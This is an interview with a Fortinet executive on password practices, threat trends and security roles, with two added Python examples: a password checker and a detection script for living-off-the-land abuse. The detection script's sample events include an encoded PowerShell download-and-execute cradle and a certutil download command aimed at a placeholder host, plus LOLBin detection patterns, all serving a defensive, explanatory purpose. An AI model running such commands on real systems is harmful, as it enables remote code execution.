Short, simple passwords take fewer resources for hackers to compromise. According to the Verizon Data Breach Investigations Report, 81% of breaches leveraged either stolen and/or weak passwords. That problem is compounded because one of the biggest risks to data security is the reuse of passwords across accounts. CIO AXIS talked to Rajesh Maurya, Regional Vice President, India & SAARC, Fortinet, to understand how employee passwords can be managed efficiently.
1. How much of a link is there between poor password practices and data breaches/cyberattacks?
According to the Verizon Data Breach Investigations Report, 81% of breaches leveraged either stolen and/or weak passwords. That problem is compounded because one of the biggest risks to data security is the reuse of passwords across accounts. If one of the accounts is compromised and your user name and password are posted on the dark web, cybercriminals who know how often passwords are reused will simply begin to plug that information into other possible accounts until they unlock one that uses the exact same credentials.
This is a common risk, as 83% of people have admitted to reusing passwords across multiple sites. Even if it is safe to reuse passwords on accounts that don’t house sensitive data – a breach there can be used as an entryway to move laterally across networks in search of critical business data or personally identifiable information (PII).
Cyber adversaries are constantly tweaking their tradecraft to ensure successful intrusions in order to generate consistent revenue and profit. If your password is guessed or stolen, you may never know it happened until anomalous purchases appear in your bank account. And even more challenging, you may not be impacted directly at all. Data accessed by leveraging your compromised account may simply be used to move up the food chain, enabling an attacker to gain access to data and resources managed by someone else.
2. Most people think there are risks with using the same password but still do it. Why do you think that is?
One of the biggest mistakes people make is using the exact same password on all their online accounts. Of course, we tend to use a LOT of different websites, so remembering a unique password for each site may be impossible. The average US email address is associated with 130 accounts. With so many passwords to remember, many have admitted to writing passwords down on pieces of paper or keeping a list of passwords in unsecured documents on their computers. These items can easily fall into the wrong hands – whether they are simply lost or are compromised in a malware attack.
There are two approaches to creating secure passwords. The first is to use a password vault that stores the username and password for each account, so all you have to remember is the single password for that application and it takes care of the rest. The other is to create tiers of applications and then create a more complex password to remember for each group. One set for sites like social media, another for places you pay your bills, and another for your online banking transactions.
Creating strong passwords you can remember isn’t as hard as it seems. For example, use the first letters of a sentence or song lyric that you are familiar with, add some capitalization and replace some of the letters with numbers or special characters and you’ve got a pretty secure password. Just set a reminder on your calendar to change those passwords every few weeks.
3. What best practice guidance do you give to CISOs and CIOs about password management?
Short, simple passwords take fewer resources for hackers to compromise. In fact, hackers maintain databases of the most common words, phrases, and number combinations that they can run your password through to find a quick match. Some of the most common passwords are baseball and football team names, any variant of 123456789, and QWERTY. Avoid using common password themes when creating a passphrase, such as the following:
• Names including movies and sports teams
• Simple obfuscation of a common word (“P@$$w0rd”)
The best password is a strong passphrase, impossible to forget and difficult to guess, even for someone who knows personal details of your life like the name of the street you live on. When creating new accounts or updating well-used passwords, Fortinet security experts recommend keeping these six best practices in mind to minimize password-based cyber risk:
1. Add an extra layer of security: use multi-factor authentication wherever possible. This confirms your identity by utilizing a combination of multiple different factors, such as something you know or something you have, such as a token generator on your smartphone.
2. Never repeat the same password for different accounts.
3. Change your passphrase at least every three months. This will lock out cybercriminals who may be using your account, protect you from brute force attacks, and remedy the issue caused by cybercriminals who purchase lists of usernames and passwords obtained through data breaches.
4. Ensure no one is watching as you enter passwords.
5. Be cautious when downloading files from the internet as they may contain key loggers as well as password grabber malware variants that will compromise your password. A good practice is to regularly scan for the presence of such malware.
6. Use a cloud-based password manager to enable you to create and store strong passphrases. This is especially important if you require strong passwords for dozens of accounts. Password management tools allow you to securely store an encrypted list of passwords in the cloud that can be accessed from any device. Not only will you only need to remember one password to access your password locker, the passwords you store there for your various accounts can be even stronger because you don’t have to remember them.
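The answer above warns that attackers run candidate passwords through lists of common words and undo simple obfuscation ("P@$$w0rd"), and the previous answer suggests building a passphrase from the initials of a memorable sentence. The following added example in Python (not code from the interview or from Fortinet) shows the checks a password policy can apply to catch the former and why the latter passes. The common-password list is a small constructed sample, and the length and entropy thresholds are assumptions.

```python
"""Password hygiene checks: undo leetspeak, match against a common-password list,
and flag keyboard walks and sequential runs.

Added illustration, not code from the interview or Fortinet. COMMON_PASSWORDS is a
constructed sample (real cracking dictionaries hold hundreds of millions of entries);
the 12-character and 60-bit thresholds are assumptions."""
import math
import re
from dataclasses import dataclass, field
from typing import List

COMMON_PASSWORDS = {
    "password", "123456", "123456789", "qwerty", "letmein", "welcome",
    "admin", "baseball", "football", "yankees", "dragon", "iloveyou",
}

# Substitutions attackers' rule sets reverse in a single pass.
LEET_MAP = str.maketrans({"@": "a", "4": "a", "$": "s", "5": "s", "0": "o",
                          "1": "i", "!": "i", "3": "e", "7": "t", "|": "l"})

KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890"]


def normalise(password: str) -> str:
    """Lower-case, drop trailing digits/punctuation, undo leetspeak:
    'P@$$w0rd' -> 'password', 'Qwerty!2019' -> 'qwerty'."""
    stripped = re.sub(r"[^a-z]+$", "", password.lower())
    return stripped.translate(LEET_MAP)


def has_keyboard_walk(password: str, min_len: int = 4) -> bool:
    """Any run of min_len adjacent keys along a keyboard row, in either direction."""
    p = password.lower()
    for row in KEYBOARD_ROWS:
        for i in range(len(p) - min_len + 1):
            chunk = p[i:i + min_len]
            if chunk in row or chunk in row[::-1]:
                return True
    return False


def has_sequence(password: str, min_len: int = 4) -> bool:
    """Runs like 'abcd' or '9876' (code points stepping by exactly +1 or -1)."""
    p = password.lower()
    for i in range(len(p) - min_len + 1):
        chunk = p[i:i + min_len]
        diffs = {ord(b) - ord(a) for a, b in zip(chunk, chunk[1:])}
        if diffs in ({1}, {-1}):
            return True
    return False


def entropy_bits(password: str) -> float:
    """Upper bound for a uniformly random choice from the character classes used."""
    pool = 0
    if re.search(r"[a-z]", password):
        pool += 26
    if re.search(r"[A-Z]", password):
        pool += 26
    if re.search(r"\d", password):
        pool += 10
    if re.search(r"[^A-Za-z0-9]", password):
        pool += 33
    return len(password) * math.log2(pool) if pool else 0.0


@dataclass
class Verdict:
    acceptable: bool
    reasons: List[str] = field(default_factory=list)
    entropy: float = 0.0


def assess(password: str, min_len: int = 12, min_bits: float = 60.0) -> Verdict:
    reasons: List[str] = []
    if len(password) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    if password.lower() in COMMON_PASSWORDS:
        reasons.append("in common-password list")
    elif normalise(password) in COMMON_PASSWORDS:
        reasons.append(f"obfuscated common word ('{normalise(password)}')")
    if has_keyboard_walk(password):
        reasons.append("keyboard walk")
    if has_sequence(password):
        reasons.append("sequential characters")
    bits = entropy_bits(password)
    if bits < min_bits:
        reasons.append(f"estimated {bits:.0f} bits < {min_bits:.0f}")
    return Verdict(not reasons, reasons, bits)


def initials_passphrase(sentence: str) -> str:
    """The mnemonic from the interview: first character of each word of a memorable
    sentence, keeping the writer's capitalisation and any digit or symbol tokens."""
    return "".join(word[0] for word in sentence.split())


if __name__ == "__main__":
    for candidate in ["P@$$w0rd", "123456789", "Qwerty!2019",
                      initials_passphrase("My first dog Rex ate 3 of my socks on a Tuesday & never apologised!")]:
        print(candidate, assess(candidate))
```

The entropy figure is an upper bound only: a dictionary word with leetspeak scores as if it were random, which is exactly why the normalisation and list checks come first.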
4. What will the threat landscape look like over the next 12 months?
Looking back at the threat landscape of the first quarter of 2019 shows that cybercriminals are not just becoming increasingly sophisticated in terms of their attack methods and tools, they are also becoming very diverse. Attackers are increasingly using a broad range of attack strategies, from targeted ransomware to custom coding, to living-off-the-land (LoTL) or sharing infrastructure to maximize their opportunities, and using pre-installed tools to move laterally and stealthily across a network before instigating an attack.
Ransomware Far From Gone: In general, previous high rates of ransomware have been replaced with more targeted attacks, but ransomware is far from gone. Instead, multiple attacks demonstrate it is being customized for high-value targets and to give the attacker privileged access to the network. The new ransomware variants demonstrate that security leaders need to remain focused on patching and backups against commodity ransomware, but targeted threats require more tailored defenses to protect against their unique attack methods.
Pre- and Post-Compromise Traffic: Research to see if threat actors carry out phases of their attacks on different days of the week demonstrates that cybercriminals are always looking to maximize opportunity to their benefit. When comparing Web filtering volume for two cyber kill chain phases during weekdays and weekends, pre-compromise activity is roughly three times more likely to occur during the work week, while post-compromise traffic shows less differentiation in that regard. This is primarily because exploitation activity often requires someone to take an action such as clicking on a phishing email. In contrast, command-and-control (C2) activity does not have this requirement and can occur anytime. Cybercriminals understand this and will work to maximize opportunity during the week when Internet activity is the most prevalent. Differentiating between weekday and weekend Web filtering practices is important to fully understand the kill chain of various attacks.
Majority of Threats Share Infrastructure: The degree to which different threats share infrastructure shows some valuable trends. Some threats leverage community-use infrastructure to a greater degree than unique or dedicated infrastructure. Nearly 60% of threats shared at least one domain indicating the majority of botnets leverage established infrastructure. Understanding what threats share infrastructure and at what points of the attack chain enables organizations to predict potential evolutionary points for malware or botnets in the future.
Content Management Needs Constant Management: Adversaries tend to move from one opportunity to the next in clusters, targeting successfully exploited vulnerabilities and technologies that are on the upswing, to quickly maximize opportunity. An example of new technologies getting a lot of attention from cybercriminals recently is Web platforms that make it easier for consumers and businesses to build Web presences. They continue to be targeted, as do associated third-party plugins. This reinforces the fact that it is critical that patches be applied immediately and to fully understand the constantly evolving world of exploits to stay ahead of the curve.
Tools and Tricks for Living Off the Land: Threat actors operate using the same business models as their victims: to maximize their efforts, attack methods often continue to develop even after gaining initial entry. To accomplish this, threat actors increasingly leverage dual-use tools or tools that are already pre-installed on targeted systems to carry out cyberattacks. This “living off the land” (LoTL) tactic allows hackers to hide their activities in legitimate processes and makes it harder for defenders to detect them. These tools also make attack attribution much harder. Unfortunately, adversaries can use a wide range of legitimate tools to accomplish their goals and hide in plain sight. Smart defenders will need to limit access to sanctioned administrative tools and log their use in their environments.
Establishing and maintaining proper defenses in a rapidly evolving threat landscape requires understanding threats before they happen, and that requires reliable and timely threat intelligence. Improving an organization’s ability to not only properly defend against current threat trends, but also prepare for the evolution and automation of attacks over time requires threat intelligence that is dynamic, proactive, and available throughout the distributed network. This knowledge can help identify trends showing the evolution of attack methods targeting the digital attack surface and to pinpoint cyber hygiene priorities based on where bad actors are focusing their efforts. The value and ability to take action on threat intelligence is severely diminished if it cannot be actionable in real time across each security device. Only a security fabric that is broad, integrated, and automated can provide protection for the entire networked environment, from IoT to the edge, network core and to multi-clouds at speed and scale.
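The living-off-the-land section above closes with two defensive measures: restrict who may run administrative tools, and log their use. The following is an added example, not code from the interview or from Fortinet, of the detection logic a SOC would run over process-creation logs to act on both. The events are constructed samples shaped like Sysmon Event ID 1 fields (user, parent image, image, command line); the LOLBin patterns and the list of accounts sanctioned to run admin tools are assumptions for the demonstration.

```python
"""Living-off-the-land (LoTL) triage over process-creation events.

Added illustration, not the interview's or Fortinet's code. EVENTS are constructed
samples shaped like Sysmon Event ID 1 fields; LOLBIN_RULES and SANCTIONED_ADMINS
are assumptions made for this demo, not a vendor rule set."""
import base64
import re
from typing import Dict, List, Optional

# Patterns for abuse of pre-installed, dual-use Windows binaries.
LOLBIN_RULES = [
    ("certutil download/decode", r"certutil(\.exe)?\s.*(-urlcache|-decode|-encode)"),
    ("powershell encoded command", r"powershell(\.exe)?\s.*-e(nc|ncodedcommand)?\s"),
    ("powershell download cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\s"),
    ("mshta remote script", r"mshta(\.exe)?\s+(https?:|javascript:|vbscript:)"),
    ("regsvr32 remote scriptlet", r"regsvr32(\.exe)?\s.*[/-]i:https?:"),
    ("rundll32 script", r"rundll32(\.exe)?\s.*(javascript:|vbscript:)"),
    ("wmic remote process", r"wmic(\.exe)?\s.*process\s+call\s+create"),
    ("bitsadmin transfer", r"bitsadmin(\.exe)?\s.*/transfer"),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ADMIN_TOOLS = {"psexec.exe", "wmic.exe", "schtasks.exe", "net.exe"}
SANCTIONED_ADMINS = {"corp\\svc_sccm", "corp\\ops_admin"}  # assumed allow-list


def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a')"

EVENTS: List[Dict[str, str]] = [  # constructed sample events
    {"user": "CORP\\alice", "parent": "outlook.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + encode_ps(CRADLE)},
    {"user": "CORP\\bob", "parent": "explorer.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://example.com/x.txt x.txt"},
    {"user": "CORP\\svc_sccm", "parent": "services.exe", "image": "wmic.exe",
     "cmd": 'wmic.exe /node:ws-01 process call create "cmd /c whoami"'},
    {"user": "CORP\\carol", "parent": "explorer.exe", "image": "wmic.exe",
     "cmd": 'wmic.exe /node:ws-07 process call create "cmd /c whoami"'},
    {"user": "CORP\\dave", "parent": "explorer.exe", "image": "notepad.exe",
     "cmd": "notepad.exe report.txt"},
    {"user": "CORP\\erin", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
]


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Recover the script hidden behind -enc/-EncodedCommand; None if absent or invalid."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: Dict[str, str]) -> List[str]:
    """Findings for one event; an empty list means nothing matched."""
    findings: List[str] = []
    texts = [event["cmd"]]
    decoded = decode_encoded_command(event["cmd"])
    if decoded:
        findings.append("decoded: " + decoded)
        texts.append(decoded)  # run the rules over the decoded script as well
    for name, pattern in LOLBIN_RULES:
        if any(re.search(pattern, t, re.I) for t in texts):
            findings.append(name)
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        findings.append(f"{event['parent']} spawned {event['image']}")
    if event["image"].lower() in ADMIN_TOOLS and event["user"].lower() not in SANCTIONED_ADMINS:
        findings.append(f"admin tool run by unsanctioned account {event['user']}")
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> findings, for events that produced at least one."""
    return {i: f for i, e in enumerate(events) if (f := analyse(e))}


if __name__ == "__main__":
    for idx, findings in triage(EVENTS).items():
        print(idx, EVENTS[idx]["user"], findings)
```

Two of the sample events use the same wmic command; only the one run by an account outside the allow-list gets the extra finding, which is the point of pairing an allow-list with logging rather than blocking the tool outright. The encoded-command decoding matters because the download cradle is invisible in the raw command line until the base64/UTF-16LE layer is removed.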
5. In the backdrop of the modern security landscape, do you see more companies appointing a CISO or CSO?
A 2019 Gartner survey shows the global talent shortage is now the top emerging risk facing organizations. The expansion of the digital marketplace has generated more jobs than the current supply of security professionals can meet. It is a problem of scale: there is currently not an efficient way to create skilled security practitioners at the same rate. Unfortunately, there are not enough skilled humans available to properly plan, manage, integrate, and optimize security devices, strategies, and protocols. For example, according to a recent workforce development survey, 59% of organizations have unfilled cybersecurity positions, with Frost & Sullivan forecasting a shortfall of 1.5 million by 2020.
Because of the expanding attack surface and proliferation of point security products and solutions, demand for security professionals has steadily increased just at the time when the shortage of available experienced security talent has never been greater. Currently, 22 percent of security leaders say their security teams are too small for their organization, and according to a recent workforce development survey, 59% of organizations have unfilled cybersecurity positions. Here are some descriptions of the requirements that C-suites and CISOs should include when seeking to fill these roles within the context of the modern threat landscape.
• Chief Information Security Officer – First, organizations must employ an experienced and effective CISO who is charged with building out the rest of the security team. The CISO must enable business and digital transformation through the effective use of security, with an eye toward cost-effectiveness and efficiency. An important function of the CISO is to work alongside the Chief Compliance Officer and General Counsel to ensure the organization operates within the standards set by various regulatory bodies. Ultimately, the CISO/CSO is responsible for the long-term security strategy of the organization, managing the budget and communicating with the C-suite and board on security KPIs and updates.
• Cybersecurity Architect – The Cybersecurity Architect plays an important strategic and tactical role within the organization, especially as security evolves to meet modern needs. To that end, the security architect is responsible for designing, implementing, and managing next-generation security deployments. This individual must work across lines of business to ensure that digital business enablement meets security requirements. As such, architects must be highly collaborative and well versed in engagement models such as DACI and RACI.
• VP/Director of Network Engineering/Network Operations – Typically reporting to the CIO or the VP of IT Infrastructure, the Head of Network Engineering and Operations plays a key role in business enablement as well as security. This role requires a unique combination of hard technical skills, as well as soft skills like leadership and entrepreneurship. The selected candidate will need a clear understanding of the networking hardware and software deployed within the organization, and how they interoperate.
Once a team is established, CISOs must ensure that these individuals can work together in an integrated way across distributed networks to minimize the use of siloed, disparate solutions. Leveraging an integrated, architectural approach to security ensures that all of these team members receive the same information at the same time, thereby simplifying management of the NOC and SOC.